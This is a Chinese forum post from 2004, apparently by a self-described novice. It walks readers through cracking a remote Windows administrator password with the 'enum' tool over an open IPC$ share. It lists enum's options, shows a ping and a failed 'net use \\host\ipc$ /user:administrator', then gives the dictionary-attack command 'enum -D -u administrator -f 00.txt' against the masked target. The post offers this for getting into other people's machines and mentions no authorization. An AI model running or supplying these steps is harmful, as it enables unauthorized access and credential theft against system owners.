命令行下用 enum 破用户密码

*****首先声明,俺是菜鸟,俺也是从书上学来的东西,俺用它来得了一个……咳咳，口干，怎么没人递水？？？唉，算了，菜鸟就是这样了，没人理的＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊ enum 使用的条件，要求 139 或 445 端口的 IPC$ 能用使用: enum [switches] [hostname|ip] -U: get userlist -M: get machine list -N: get namelist dump (different from -U|-M) -S: get sharelist -P: get password policy information -G: get group and member list -L: get LSA policy information -D: dictionary crack, needs -u and -f -d: be detailed, applies to -U and -S -c: don't cancel sessions -u: specify username to use (default "") -p: specify password to use (default "") -f: specify dictfile to use (wants -D) [em05]我晕，我晕，我晕晕晕…… 那些 E 文你们自己看下面我就说怎么用它来破解大家都想要的东西先说要用到的几个参数： ① -D 字典破解 ② -u 用户名(要破解的用户) （注意它 -U (返回用户名的列表) 不同） ③ -f 字典文件 ok,let's go now! ------------------------------------------ C:>ping xxx.xxx.xxx.xxx Pinging xxx.xxx.xxx.xxx with 32 bytes of data: Reply from xxx.xxx.xxx.xxx: bytes=32 time<1ms TTL=128 Reply from xxx.xxx.xxx.xxx: bytes=32 time<1ms TTL=128 Reply from xxx.xxx.xxx.xxx: bytes=32 time<1ms TTL=128 Reply from xxx.xxx.xxx.xxx: bytes=32 time<1ms TTL=128 Ping statistics for xxx.xxx.xxx.xxx: Packets: Sent = 4, Received = 4, Lost = 0 (0% loss), Approximate round trip times in milli-seconds: Minimum = 0ms, Maximum = 0ms, Average = 0ms *********************** ** 下一步 *********************** C:>net use \\xxx.xxx.xxx.xxx\ipc$ /user:administrator 密码或用户名在 \\xxx.xxx.xxx.xxx\ipc$ 无效。输入 'administrator' 的密码来连接到 'xxx.xxx.xxx.xxx': ****************************************************************************** ** 闷,这个用户他又不用,设什么鬼密码? &^$%#^$^%*&^%%$^$#^$#$(此处过滤一部分) ****************************************************************************** ** 拿出我的 enum 来 ***************************************************************************** enum -D -u administrator -f 00.txt \\xxx.xxx.xxx.xxx (说明, 00.txt 是俺的"新华字典",你没的话就掏MONEY去新华书店买一本吧) ****************************************************************************** 下面的就省了,你自己玩玩看吧!

满天飞 该用户已被删除

沙发

满天飞发表于 2004-3-12 09:52 | 只看该作者